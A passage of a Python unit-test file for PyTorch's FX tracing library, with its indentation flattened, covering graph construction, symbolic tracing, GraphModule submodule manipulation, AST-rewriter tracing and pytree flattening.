u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
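# concrete_args partially specializes tracing: the supplied values are treated
# as constants, Python control flow over them is resolved at trace time, and
# torch._assert guards are emitted so the specialized module fails loudly when
# invoked with different values, as the assertions above demonstrate.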
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
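# The test above walks the GraphModule submodule-manipulation API:
# add_submodule / delete_submodule install or remove modules by qualified
# path, get_submodule / get_parameter / get_buffer fetch them with descriptive
# errors, and delete_all_unused_submodules drops modules no longer referenced
# by any call_module or get_attr node (while keeping referenced parameters and
# buffers, as checked above).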
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test that the custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
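# Descriptive note: the flatten fn above maps a Foo to its leaf list [x.a, x.b]
# with no extra context, the unflatten fn rebuilds a Foo from that list, and the
# fx-specific flatten_spec flattens Foo the same way for tree_flatten_spec.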
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
